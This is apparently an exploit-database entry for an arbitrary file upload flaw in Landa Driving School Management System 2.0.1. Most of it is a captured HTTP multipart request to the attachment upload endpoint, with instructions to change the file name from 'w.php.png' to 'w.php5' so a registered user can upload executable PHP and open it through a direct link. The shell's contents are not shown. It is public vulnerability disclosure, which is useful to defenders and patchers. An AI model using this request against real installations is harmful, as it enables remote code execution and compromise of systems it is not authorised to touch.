# Exploit Title: Landa Driving School Management System Arbitrary File Upload # Version 2.0.1 # Google Dork: N/A # Date: 17/01/2022 # Exploit Author: Sohel Yousef - sohel.yousef@yandex.com # Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151 # Software link 2 :https://simcycreative.com/landa/ # Software Demo : https://landa.simcycreative.com/ # Category: webapps Landa Driving School Management System contain arbitrary file upload registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw details POST /profile/attachment/upload/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: */* Accept-Language: ar,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048 Content-Length: 294983 Origin: https://localhost Connection: close Referer: https://localhost/profile/91/ Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="name" sddd -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="csrf-token" e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="userid" 91 -----------------------------215084716322124620333137564048 Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5 Content-Type: image/png you will have a direct link to the uploaded files